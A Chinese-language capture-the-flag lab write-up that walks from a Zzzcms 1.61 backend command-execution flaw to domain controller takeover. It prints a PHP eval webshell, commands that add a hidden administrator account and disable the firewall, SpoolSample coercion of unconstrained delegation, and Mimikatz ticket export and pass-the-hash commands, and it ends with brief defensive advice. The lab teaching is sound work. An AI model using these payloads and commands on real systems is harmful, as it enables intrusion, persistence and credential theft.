cyberstrikelab lab8 wp
字数 1059 2025-08-29 22:41:32
Zzzcms 1.61 渗透测试实战教学文档
信息收集阶段
-
初始扫描
- 使用fscan进行全端口扫描,识别开放服务
- 发现存在一个基于Zzzcms的网站
-
CMS识别
- 确认CMS版本为Zzzcms 1.61
- 该版本存在已知的后台远程命令执行漏洞
漏洞利用
Zzzcms 1.61 后台远程命令执行漏洞
-
初始访问
- 使用弱口令组合:
admin/admin123456成功登录后台
- 使用弱口令组合:
-
漏洞利用步骤
- 进入"本地模板管理"功能
- 找到并编辑
search.html模板文件 - 修改内容为PHP代码(如
<?php phpinfo();?>) - 保存后访问相应页面验证代码执行
-
WebShell植入
- 将模板内容替换为一句话木马(如
<?php eval($_POST['cmd']);?>) - 使用蚁剑等工具尝试连接(注意:实际环境中可能因杀软拦截而失败)
- 将模板内容替换为一句话木马(如
内网渗透
横向移动技术
-
代理搭建
- 使用Stowaway代理工具建立内网通道
- 通过代理上传免杀木马文件
-
权限提升
- 使用"土豆"提权工具获取系统权限
- 执行命令:
net user hacker P@ssw0rd /add net localgroup administrators hacker /add netsh advfirewall set allprofiles state off
-
内网信息收集
- 检查网络配置:
ipconfig /all - 扫描C段(如10.5.5.0/24)
- 发现10.5.5.33主机开放3389端口
- 检查网络配置:
-
凭证爆破
- 使用爆破工具尝试RDP登录
- 成功凭证:
administrator/admin@123456
域渗透技术
-
域信息收集
- 使用CS的svc-exe提权到SYSTEM
- 执行命令收集域信息:
net group "Domain Admins" /domain net group "Domain Computers" /domain
-
非约束委派利用
- 发现
cyberweb主机配置了非约束委派 - 利用打印机漏洞(SpoolSample)强制域控访问受控主机
- 使用工具:
.\SpoolSample.exe DC01 WEB01
- 发现
-
凭证窃取
- 使用Mimikatz导出域控的NTLM哈希:
mimikatz.exe "sekurlsa::tickets /export" - 执行Pass-the-Hash攻击:
mimikatz.exe "sekurlsa::pth /user:Administrator /domain:cyberlab /ntlm:<hash>"
- 使用Mimikatz导出域控的NTLM哈希:
参考资源
-
Zzzcms漏洞分析:
- https://xz.aliyun.com/news/4103
- https://zhuanlan.zhihu.com/p/58909740
-
非约束委派利用:
- https://forum.butian.net/share/1591
防御建议
-
针对Zzzcms
- 及时升级到最新版本
- 修改默认管理员密码为强密码
- 限制后台模板编辑权限
-
内网防护
- 启用防火墙并配置严格规则
- 监控异常账户添加行为
- 禁用非必要的委派配置
-
域安全
- 定期检查域内委派配置
- 监控Kerberos认证异常
- 启用LSA保护防止凭据窃取
本教学文档完整呈现了从外网渗透到域控控制的完整攻击链,重点突出了Zzzcms漏洞利用、内网横向移动和域渗透技术的关键步骤。